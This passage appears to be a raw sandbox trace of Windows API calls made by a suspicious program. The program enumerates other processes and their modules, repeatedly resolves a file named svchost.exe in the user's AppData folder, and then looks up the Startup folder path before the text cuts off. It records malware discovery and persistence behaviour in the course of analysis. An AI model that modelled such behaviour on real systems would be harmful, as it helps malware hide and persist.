hProcess=0x218, hModule=0x752a0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0077.686] CoTaskMemFree (pv=0xd94a00) [0077.686] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.686] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0077.687] CoTaskMemFree (pv=0xd94a00) [0077.687] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x24bbdc0, cb=0x18 | out: lpmodinfo=0x24bbdc0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0077.687] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.687] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0077.688] CoTaskMemFree (pv=0xd94a00) [0077.688] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.688] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0077.689] CoTaskMemFree (pv=0xd94a00) [0077.689] CloseHandle (hObject=0x218) returned 1 [0077.690] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0077.691] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x94c) returned 0x218 [0077.691] EnumProcessModules (in: hProcess=0x218, lphModule=0x24be4e0, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24be4e0, lpcbNeeded=0x23ee40) returned 1 [0077.691] GetModuleInformation (in: hProcess=0x218, hModule=0x110000, lpmodinfo=0x24be750, cb=0x18 | out: lpmodinfo=0x24be750*(lpBaseOfDll=0x110000, SizeOfImage=0x17000, EntryPoint=0x1114a1)) returned 1 [0077.692] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.692] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x110000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="writer.exe") returned 0xa [0077.692] CoTaskMemFree (pv=0xd94a00) [0077.692] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.692] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x110000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Program Files\\Common Files\\writer.exe" (normalized: "c:\\program files\\common files\\writer.exe")) returned 0x28 [0077.693] CoTaskMemFree (pv=0xd94a00) [0077.693] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x24c0960, cb=0x18 | out: lpmodinfo=0x24c0960*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0077.693] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.693] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0077.693] CoTaskMemFree (pv=0xd94a00) [0077.693] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.694] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0077.694] CoTaskMemFree (pv=0xd94a00) [0077.694] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x24c2b20, cb=0x18 | out: lpmodinfo=0x24c2b20*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0077.694] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.694] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0077.695] CoTaskMemFree (pv=0xd94a00) [0077.695] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.695] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0077.695] CoTaskMemFree (pv=0xd94a00) [0077.696] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x24c4ce0, cb=0x18 | out: lpmodinfo=0x24c4ce0*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0077.696] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.696] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0077.697] CoTaskMemFree (pv=0xd94a00) [0077.697] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.697] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0077.697] CoTaskMemFree (pv=0xd94a00) [0077.697] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x24c6eb0, cb=0x18 | out: lpmodinfo=0x24c6eb0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0077.698] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.698] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0077.698] CoTaskMemFree (pv=0xd94a00) [0077.698] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.698] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0077.699] CoTaskMemFree (pv=0xd94a00) [0077.699] CloseHandle (hObject=0x218) returned 1 [0077.700] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0077.700] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x530) returned 0x0 [0077.701] EnumProcesses (in: lpidProcess=0x24c95e8, cb=0x400, lpcbNeeded=0x23ed28 | out: lpidProcess=0x24c95e8, lpcbNeeded=0x23ed28) returned 1 [0077.720] EtwEventRegister (in: ProviderId=0x24caf08, EnableCallback=0x1ae313cc, CallbackContext=0x0, RegHandle=0x24caee8 | out: RegHandle=0x24caee8) returned 0x0 [0077.749] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb98) returned 0x21c [0077.749] EnumProcessModules (in: hProcess=0x21c, lphModule=0x24ccfc0, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24ccfc0, lpcbNeeded=0x23ee40) returned 1 [0077.749] GetModuleInformation (in: hProcess=0x21c, hModule=0x1390000, lpmodinfo=0x24cd230, cb=0x18 | out: lpmodinfo=0x24cd230*(lpBaseOfDll=0x1390000, SizeOfImage=0x17000, EntryPoint=0x13914a1)) returned 1 [0077.750] CoTaskMemAlloc (cb=0x804) returned 0xd95690 [0077.750] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x1390000, lpBaseName=0xd95690, nSize=0x800 | out: lpBaseName="notepad.exe") returned 0xb [0077.750] CoTaskMemFree (pv=0xd95690) [0077.750] CoTaskMemAlloc (cb=0x804) returned 0xd95690 [0077.750] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x1390000, lpFilename=0xd95690, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Portable Devices\\notepad.exe" (normalized: "c:\\program files\\windows portable devices\\notepad.exe")) returned 0x35 [0077.750] CoTaskMemFree (pv=0xd95690) [0077.751] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x24cf458, cb=0x18 | out: lpmodinfo=0x24cf458*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0077.751] CoTaskMemAlloc (cb=0x804) returned 0xd95690 [0077.751] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0xd95690, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0077.751] CoTaskMemFree (pv=0xd95690) [0077.751] CoTaskMemAlloc (cb=0x804) returned 0xd95690 [0077.751] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0xd95690, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0077.752] CoTaskMemFree (pv=0xd95690) [0077.752] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x24d1630, cb=0x18 | out: lpmodinfo=0x24d1630*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0077.752] CoTaskMemAlloc (cb=0x804) returned 0xd95690 [0077.752] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0xd95690, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0077.753] CoTaskMemFree (pv=0xd95690) [0077.753] CoTaskMemAlloc (cb=0x804) returned 0xd95690 [0077.753] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0xd95690, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0077.754] CoTaskMemFree (pv=0xd95690) [0077.754] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x24d37f0, cb=0x18 | out: lpmodinfo=0x24d37f0*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0077.754] CoTaskMemAlloc (cb=0x804) returned 0xd95690 [0077.754] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0xd95690, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0077.755] CoTaskMemFree (pv=0xd95690) [0077.755] CoTaskMemAlloc (cb=0x804) returned 0xd95690 [0077.755] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x752a0000, lpFilename=0xd95690, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0077.755] CoTaskMemFree (pv=0xd95690) [0077.755] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x24d59c0, cb=0x18 | out: lpmodinfo=0x24d59c0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0077.756] CoTaskMemAlloc (cb=0x804) returned 0xd95690 [0077.756] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0xd95690, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0077.756] CoTaskMemFree (pv=0xd95690) [0077.756] CoTaskMemAlloc (cb=0x804) returned 0xd95690 [0077.756] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0xd95690, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0077.757] CoTaskMemFree (pv=0xd95690) [0077.757] CloseHandle (hObject=0x21c) returned 1 [0077.758] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0077.758] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa5c) returned 0x21c [0077.759] EnumProcessModules (in: hProcess=0x21c, lphModule=0x24d80e0, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24d80e0, lpcbNeeded=0x23ee40) returned 1 [0077.759] GetModuleInformation (in: hProcess=0x21c, hModule=0x1300000, lpmodinfo=0x24d8350, cb=0x18 | out: lpmodinfo=0x24d8350*(lpBaseOfDll=0x1300000, SizeOfImage=0x17000, EntryPoint=0x13014a1)) returned 1 [0077.759] CoTaskMemAlloc (cb=0x804) returned 0xd95690 [0077.759] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x1300000, lpBaseName=0xd95690, nSize=0x800 | out: lpBaseName="include ten.exe") returned 0xf [0077.760] CoTaskMemFree (pv=0xd95690) [0077.760] CoTaskMemAlloc (cb=0x804) returned 0xd95690 [0077.760] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x1300000, lpFilename=0xd95690, nSize=0x800 | out: lpFilename="C:\\Program Files\\Internet Explorer\\include ten.exe" (normalized: "c:\\program files\\internet explorer\\include ten.exe")) returned 0x32 [0077.760] CoTaskMemFree (pv=0xd95690) [0077.760] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x24da578, cb=0x18 | out: lpmodinfo=0x24da578*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0077.761] CoTaskMemAlloc (cb=0x804) returned 0xd95690 [0077.761] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0xd95690, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0077.761] CoTaskMemFree (pv=0xd95690) [0077.761] CoTaskMemAlloc (cb=0x804) returned 0xd95690 [0077.761] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0xd95690, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0077.762] CoTaskMemFree (pv=0xd95690) [0077.762] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x24dc738, cb=0x18 | out: lpmodinfo=0x24dc738*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0077.762] CoTaskMemAlloc (cb=0x804) returned 0xd95690 [0077.762] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0xd95690, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0077.762] CoTaskMemFree (pv=0xd95690) [0077.763] CoTaskMemAlloc (cb=0x804) returned 0xd95690 [0077.763] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0xd95690, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0077.763] CoTaskMemFree (pv=0xd95690) [0077.763] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x24de8f8, cb=0x18 | out: lpmodinfo=0x24de8f8*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0077.763] CoTaskMemAlloc (cb=0x804) returned 0xd95690 [0077.763] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0xd95690, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0077.764] CoTaskMemFree (pv=0xd95690) [0077.764] CoTaskMemAlloc (cb=0x804) returned 0xd95690 [0077.764] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x752a0000, lpFilename=0xd95690, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0077.765] CoTaskMemFree (pv=0xd95690) [0077.765] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x24e0ac8, cb=0x18 | out: lpmodinfo=0x24e0ac8*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0077.765] CoTaskMemAlloc (cb=0x804) returned 0xd95690 [0077.765] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0xd95690, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0077.766] CoTaskMemFree (pv=0xd95690) [0077.766] CoTaskMemAlloc (cb=0x804) returned 0xd95690 [0077.766] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0xd95690, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0077.766] CoTaskMemFree (pv=0xd95690) [0077.767] CloseHandle (hObject=0x21c) returned 1 [0077.768] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0077.768] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x944) returned 0x21c [0077.768] EnumProcessModules (in: hProcess=0x21c, lphModule=0x24e31e8, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24e31e8, lpcbNeeded=0x23ee40) returned 1 [0077.768] GetModuleInformation (in: hProcess=0x21c, hModule=0x1100000, lpmodinfo=0x24e3458, cb=0x18 | out: lpmodinfo=0x24e3458*(lpBaseOfDll=0x1100000, SizeOfImage=0x17000, EntryPoint=0x11014a1)) returned 1 [0077.769] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0077.769] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x1100000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="tvopportunity.exe") returned 0x11 [0077.769] CoTaskMemFree (pv=0xd910e0) [0077.769] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0077.769] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x1100000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Microsoft SQL Server\\tvopportunity.exe" (normalized: "c:\\program files (x86)\\microsoft sql server\\tvopportunity.exe")) returned 0x3d [0077.771] CoTaskMemFree (pv=0xd910e0) [0077.771] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x24e56b8, cb=0x18 | out: lpmodinfo=0x24e56b8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0077.771] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0077.771] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0077.772] CoTaskMemFree (pv=0xd910e0) [0077.772] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0077.772] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0077.772] CoTaskMemFree (pv=0xd910e0) [0077.772] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x24e7878, cb=0x18 | out: lpmodinfo=0x24e7878*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0077.773] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0077.773] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0077.773] CoTaskMemFree (pv=0xd910e0) [0077.773] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0077.773] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0077.774] CoTaskMemFree (pv=0xd910e0) [0077.774] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x24e9a38, cb=0x18 | out: lpmodinfo=0x24e9a38*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0077.774] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0077.774] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0077.775] CoTaskMemFree (pv=0xd910e0) [0077.775] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0077.775] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x752a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0077.775] CoTaskMemFree (pv=0xd910e0) [0077.775] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x24ebc08, cb=0x18 | out: lpmodinfo=0x24ebc08*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0077.776] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0077.776] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0077.776] CoTaskMemFree (pv=0xd910e0) [0077.776] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0077.777] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0077.777] CoTaskMemFree (pv=0xd910e0) [0077.777] CloseHandle (hObject=0x21c) returned 1 [0077.778] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0077.779] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb90) returned 0x21c [0077.779] EnumProcessModules (in: hProcess=0x21c, lphModule=0x24ee328, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24ee328, lpcbNeeded=0x23ee40) returned 1 [0077.779] GetModuleInformation (in: hProcess=0x21c, hModule=0xa60000, lpmodinfo=0x24ee598, cb=0x18 | out: lpmodinfo=0x24ee598*(lpBaseOfDll=0xa60000, SizeOfImage=0x17000, EntryPoint=0xa614a1)) returned 1 [0077.779] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0077.779] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0xa60000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ncftp.exe") returned 0x9 [0077.780] CoTaskMemFree (pv=0xd910e0) [0077.780] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0077.780] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0xa60000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Common Files\\ncftp.exe" (normalized: "c:\\program files (x86)\\common files\\ncftp.exe")) returned 0x2d [0077.780] CoTaskMemFree (pv=0xd910e0) [0077.781] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x24f07b0, cb=0x18 | out: lpmodinfo=0x24f07b0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0077.781] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0077.781] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0077.781] CoTaskMemFree (pv=0xd910e0) [0077.781] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0077.781] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0077.782] CoTaskMemFree (pv=0xd910e0) [0077.782] GetModuleInformation (in: hProcess=0x21c, hModule=0x75300000, lpmodinfo=0x24f2970, cb=0x18 | out: lpmodinfo=0x24f2970*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0077.782] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0077.782] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0077.783] CoTaskMemFree (pv=0xd910e0) [0077.783] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0077.783] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0077.783] CoTaskMemFree (pv=0xd910e0) [0077.783] GetModuleInformation (in: hProcess=0x21c, hModule=0x752a0000, lpmodinfo=0x24f4b30, cb=0x18 | out: lpmodinfo=0x24f4b30*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0077.784] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0077.784] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x752a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0077.785] CoTaskMemFree (pv=0xd910e0) [0077.785] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0077.785] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x752a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0077.785] CoTaskMemFree (pv=0xd910e0) [0077.785] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x24f6d00, cb=0x18 | out: lpmodinfo=0x24f6d00*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0077.786] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0077.786] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0077.786] CoTaskMemFree (pv=0xd910e0) [0077.786] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0077.786] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0077.787] CoTaskMemFree (pv=0xd910e0) [0077.787] CloseHandle (hObject=0x21c) returned 1 [0077.788] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0077.864] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0077.878] CoTaskMemAlloc (cb=0x20c) returned 0xd57ef0 [0077.879] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0xd57ef0 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0077.883] CoTaskMemFree (pv=0xd57ef0) [0077.883] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Start 